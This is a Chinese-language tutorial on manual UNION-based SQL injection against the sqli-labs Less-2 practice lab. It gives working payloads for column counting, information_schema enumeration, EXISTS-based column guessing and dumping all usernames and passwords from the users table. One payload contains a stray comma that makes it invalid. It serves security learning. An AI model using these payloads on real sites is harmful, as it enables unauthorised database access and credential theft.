sql注入之手工注入示例详解
<p><span><strong>前言</strong></span></p>
<p>
这篇文章就是一个最基本的sql手工注入的过程了。基本上在sqlilabs上面的实验,如果知道了其中的全部知识点,都可以通过以下的步骤进行脱裤。下面的这个步骤也是其他的脱裤手段的基础。如果想要精通sql注入,那么这个最基本的脱裤步骤是必须了解和掌握的。</p>
<p>
<span><strong>为了方便说明,我们还是用之前的数字型的注入点为例来进行说明。</strong></span></p>
<p>
<span><strong>得到字段总数</strong></span></p>
<p>
在前面的介绍中,我们已经知道在<code>http://localhost/sqlilabs/less-2/?id=1id</code>是一个注入点。</p>
<p>
后台的sql语句的写法大致为</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_533990">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">select</code> <code class="sql plain">username,</code><code class="sql keyword">password</code><code class="sql plain">,[....] </code><code class="sql keyword">from</code> <code class="sql keyword">table</code> <code class="sql keyword">where</code> <code class="sql plain">id=userinput</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
那么我们通过使用<code>order by</code>的语句来判断<code>select</code>所查询字段的数目。</p>
<p>
那么payload变为:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_522656">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=1 </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">1/2/3/4....</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
当使用<code>order by 4</code>时程序出错,那么<code>select</code>的字段一共是3个。</p>
<p>
<span><strong>得到显示位</strong></span></p>
<p>
在页面上会显示从<code>select</code>中选取的字段,我们接下来就是要判断显示的字段是哪几个字段。</p>
<p>
使用如下的payload(两者均可)进行判断。</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_206988">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,2,3 </code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=1 </code><code class="sql color1">and</code> <code class="sql plain">1=2 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,2,3</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
当使用个如上的payload时,页面的显示如下:</p>
<p>
<img title="sql注入之手工注入示例详解" alt="sql注入之手工注入示例详解" src="https://zhuji.jb51.net/uploads/img/202305/0fb8bd9971be60af57fca18eb35d9d1e.jpg"></p>
<p>
通过如上的页面显示就可以知道,页面中显示的是第2位和第3位的信息。</p>
<p>
<span><strong>查选库</strong></span></p>
<p>
在知道了显示位之后,那么接下来就可以通过显示位来显示我们想知道的信息,如数据库的版本,用户信息等等。那么我们使用如下的payload就可以知道相关的信息。</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_223553">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,version(),</code><code class="sql keyword">database</code><code class="sql plain">()</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
此时页面的显示为:</p>
<p>
<img title="sql注入之手工注入示例详解" alt="sql注入之手工注入示例详解" src="https://zhuji.jb51.net/uploads/img/202305/bc3a3fca7b48851b032828a9e3ce8dd6.jpg"></p>
<p>
可以看到在页面上就出现了数据库的版本信息和当前使用的数据库信息。</p>
<p>
那么接下来我们通过这种方式知道数据库中所有的数据库的名称。</p>
<p>
payload如下:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_432834">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,2,schema_name, </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.schemata limit 0,1 #得到第一个库名</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,2,schema_name, </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.schemata limit 1,1 #得到第二个库名</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">...</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
<span><strong>查选表名</strong></span></p>
<p>
由于<code>database()</code>返回的就是当前web程序所使用的数据库名,那么我们就利用<code>database()</code>来查询所有的表信息。当然在上一步中。我们也已经知道当前的<code>database</code>就是<code>security</code>。</p>
<p>
那么我们构造的payload如下:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_688946">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,group_concat(table_name),3 </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables </code><code class="sql keyword">where</code> <code class="sql plain">table_schema=</code><code class="sql keyword">database</code><code class="sql plain">()</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
这样我们就得到当前数据库下所有的表名了。页面返回的结果是:</p>
<p>
<img title="sql注入之手工注入示例详解" alt="sql注入之手工注入示例详解" src="https://zhuji.jb51.net/uploads/img/202305/2c774311e2d0225e67411168f6af0710.jpg"></p>
<p>
所以我们知道在当前的数据库中存在4张表,分别是<code>emails,referers,uagents,users</code>。</p>
<p>
<span><strong>查选列名</strong></span></p>
<p>
在知道了表名之后,接下来我们利用<code>information_schema.columns</code>就可以根据表名来获取当前表中所有的字段。</p>
<p>
payload如下:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_288593">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,group_concat(column_name),3 </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.columns </code><code class="sql keyword">where</code> <code class="sql plain">table_name=</code><code class="sql string">'users'</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,group_concat(column_name),3 </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.columns </code><code class="sql keyword">where</code> <code class="sql plain">table_name=0x7573657273(users的十六进制)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
页面的显示结果如下:</p>
<p>
<img title="sql注入之手工注入示例详解" alt="sql注入之手工注入示例详解" src="https://zhuji.jb51.net/uploads/img/202305/5fba91c62d36685a403c585ac91b1a63.jpg"></p>
<p>
通过这个语句,我们就知道在users表中存在<code>user,current_connections,total_connections,id,username,password,id,name,password</code>这些字段。但是我本地测试的测试的时候,这个存在一个问题,实际上在security数据库的users的表中,只有<code>id,username,password</code>这3个字段,其他的字段都是其他数据库的中users表的字段名。</p>
<p>
通过上面的payload,我们也同样可以知道在<code>emails,referers,uagents</code>中的字段名称。</p>
<p>
但是有的时候后台的代码可能仅用了使用<code>where</code>子句,那么这个时候就无法通过<code>information_schema.coumns</code>来得到列名了,这个时候只能够根据你自己多年的黑客经验来进行猜解了。猜解的方法也是比较的简单,使用<code>exists</code>子句就可以进行猜解了。假设在我们已经知道了表名的情况下(当然猜解表名也使用通过exists子句来完成)。</p>
<p>
猜解的语句如下:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_645875">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=1 </code><code class="sql color1">and</code> <code class="sql plain">exists(</code><code class="sql keyword">select</code> <code class="sql plain">uname </code><code class="sql keyword">from</code> <code class="sql plain">users)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
主要的语句就是<code>exists(select 需要猜解的列名 from users)</code>这种句式。如果在users表中不存在<code>uname</code>列名,则页面不会显示内容或者是直接出现sql的错误语句。</p>
<p>
如下如所示:</p>
<p>
<img title="sql注入之手工注入示例详解" alt="sql注入之手工注入示例详解" src="https://zhuji.jb51.net/uploads/img/202305/90bb3aebd69f53affef7b8a1f57c5242.jpg"></p>
<p>
下面这个就是猜解到了users表中存在的字段。</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_62548">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=1 </code><code class="sql color1">and</code> <code class="sql plain">exists(</code><code class="sql keyword">select</code> <code class="sql plain">username </code><code class="sql keyword">from</code> <code class="sql plain">users)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
猜测在users表中存在<code>username</code>列,上面的语句程序可以正常第返回结果,那么寿命在users表中确实存在<code>username</code>列名。</p>
<p>
<span><strong>脱裤</strong></span></p>
<p>
在知道了当前数据库所有的表名和字段名之后,接下来我们就可以dump数据库中所有的信息了。比如我们下载当前users表中所有的数据。</p>
<p>
可以使用如下的payload:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_931223">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/sqlilabs/less-2/?id=-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,group_concat(username,</code><code class="sql keyword">password</code><code class="sql plain">),3 </code><code class="sql keyword">from</code> <code class="sql plain">users</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
就可以得到users表中所有的<code>username</code>和<code>password</code>的数据了,通过这种方式也能够得到其他表中的数据了。</p>
<p>
<span><strong>总结</strong></span></p>
<p>
以上就是说sql手工注入的完整示例介绍,不知道大家都学会了?小编还需继续更新关于sql注入的文章,请继续关注。</p>
頁:
[1]